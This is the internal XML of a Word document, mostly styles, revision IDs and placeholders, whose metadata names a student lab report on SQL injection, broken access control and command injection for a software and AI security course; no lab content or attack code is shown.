    <w:rsid w:val="00FC022B"/>
    <w:rsid w:val="00FD4585"/>
    <w:rsid w:val="00FE1EE8"/>
    <w:rsid w:val="00FE46D2"/>
    <w:rsid w:val="00FE6A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69A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{65799681-B104-48B3-8628-3606DC79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6E8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00665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5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5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5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5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5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201"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00665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201"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00665201"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00665201"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00665201"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00665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201"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00665201"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E12E7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12E7D"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E12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2E7D"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0E2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00031DB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2862F2"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00286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DD466527EB416581C977C9A00A5F5E"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{DAF7B806-B87A-496C-9459-322ABED54DA8}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="003B2D93" w:rsidRDefault="00F71925" w:rsidP="00F71925">
          <w:pPr>
            <w:pStyle w:val="25DD466527EB416581C977C9A00A5F5E"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:caps/>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="80"/>
              <w:szCs w:val="80"/>
            </w:rPr>
            <w:t>[Document title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="B1B9817C43AD46FE8D248A33EAAE3847"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{62A5D2F6-088E-4F00-BD7C-C067120E4ADB}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="003B2D93" w:rsidRDefault="00F71925" w:rsidP="00F71925">
          <w:pPr>
            <w:pStyle w:val="B1B9817C43AD46FE8D248A33EAAE384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2E"/>
    <w:rsid w:val="00014167"/>
    <w:rsid w:val="003B2D93"/>
    <w:rsid w:val="0041151F"/>
    <w:rsid w:val="004423D8"/>
    <w:rsid w:val="0045149C"/>
    <w:rsid w:val="004C252B"/>
    <w:rsid w:val="00611F65"/>
    <w:rsid w:val="006223A1"/>
    <w:rsid w:val="006318DD"/>
    <w:rsid w:val="0073142E"/>
    <w:rsid w:val="009D339D"/>
    <w:rsid w:val="00BC6B00"/>
    <w:rsid w:val="00EB7477"/>
    <w:rsid w:val="00EF3E11"/>
    <w:rsid w:val="00F719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DD466527EB416581C977C9A00A5F5E">
    <w:name w:val="25DD466527EB416581C977C9A00A5F5E"/>
    <w:rsid w:val="00F71925"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B1B9817C43AD46FE8D248A33EAAE3847">
    <w:name w:val="B1B9817C43AD46FE8D248A33EAAE3847"/>
    <w:rsid w:val="00F719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2026-10-21T00:00:00</PublishDate>
  <Abstract/>
  <CompanyAddress>Ziad Abillama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0AA722-9041-40F9-A1AD-7EFBE93B7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10</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Lab 1 – SQL Injection</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Broken access control and command injection</dc:title>
  <dc:subject>EECE503M: Software &amp; AI Security</dc:subject>
  <dc:creator>L'Emir Ziad Abi El Lamah (Student)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>L'Emir Ziad Abi El Lamah (Student)</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-24T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-23T20:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>